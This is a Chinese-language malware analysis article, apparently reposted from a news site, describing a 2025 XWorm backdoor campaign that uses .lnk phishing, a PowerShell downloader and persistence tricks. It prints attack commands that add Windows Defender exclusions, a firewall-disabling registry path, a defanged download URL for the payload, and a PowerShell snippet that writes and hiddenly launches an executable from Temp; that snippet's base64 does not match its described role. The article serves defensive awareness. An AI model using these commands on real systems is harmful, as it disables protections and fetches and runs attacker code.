XWorm 后门于 2025 年年中悄然出现,现已发展成为一种看似复杂的威胁,利用用户信心和系统惯例。
当组织注意到伪装成良性文档的基于.lnk的晦涩网络钓鱼电子邮件突然增加时,初步报告浮出水面。
安全团队很快观察到,这些快捷方式触发了隐藏的 PowerShell 例程,而不是打开任何预期的文件,这表明出现了新的感染链。
几天之内,多个行业的企业报告了与陌生 IP 地址的异常网络连接,暗示存在活跃的命令和控制 (C2) 基础设施。
随着活动势头的增强,Trellix 分析师发现与 XWorm 早期的、更可预测的方法有明显不同。
简单的批处理脚本和明显的 VBScript 有效负载已经一去不复返了;相反,攻击者现在部署了一种利用社会工程和技术诡计的多阶段机制。
最初的.lnk文件通常通过有针对性的鱼叉式网络钓鱼传递,在从远程主机静默获取“discord.exe”之前,会丢弃一个看似良性的文本工件。
执行后,此 .基于 NET 的可执行文件解压缩并启动另外两个 components—main.exe 和 system32.exe,后者用作核心 XWorm 有效负载。
一旦system32.exe建立起来,它就会执行严格的环境检查,如果检测到沙箱或虚拟机,则中止。
如果主机被认为是真实的,恶意软件会将自身复制为 Xclient.exe,并通过创建计划任务和注册表运行项来建立持久性。
系统防御被有条不紊地拆除:通过修改 来禁用 Windows 防火墙策略,同时绕过 PowerShell 执行策略以将恶意进程列入白名单。HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DisableFirewall
ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\Temp\discord.exe"
ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess "Xclient.exe"
这些命令确保 XWorm 在最少的审查下运行,允许不受限制地访问受感染的环境。
感染机制和部署
XWorm 新链的核心在于其巧妙地使用 base64 编码与 Rijndael 解密相结合,允许有效负载在执行之前保持隐藏状态。
初始.lnk文件嵌入了一个 base64 字符串,该字符串解码为单行 PowerShell 命令。
此命令从 中检索“discord.exe”,并将其保存到 Temp 目录,然后再秘密启动它。hxxp://85[.]203[.]4[.]232:5000/Discord.exe
$payload = "ZG93bmxvYWQgZnJvbSAgaHR0cDovLzg1LjIwMy4zLjIzMjo1MDAwL0Rpc2NvcmQuZXhl"
[IO.File]::WriteAllBytes("$env:TEMP\discord.exe", [Convert]::FromBase64String($payload))
Start-Process "$env:TEMP\discord.exe" -WindowStyle Hidden激活后,discord.exe滴main.exe和system32.exe,每个滴都装有先进的混淆技术,以阻止静态分析。
Main.exe 的资源部分包含嵌入式 Python 模块,而 system32.exe 实现了早期的 TLS 回调,以便在任何安全钩子干预之前执行关键代码。
这种分层方法不仅使检测变得复杂,而且确保每个组件都强化下一个组件,从而产生一个有弹性、以隐身为中心的感染链,挑战传统的防御策略。
通过这种演变,XWorm 展示了如何融合社会工程、多阶段有效负载交付和复杂的加密隐藏,使对手能够超越现有的检测技术,在目标网络内保持隐蔽性和持久性。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
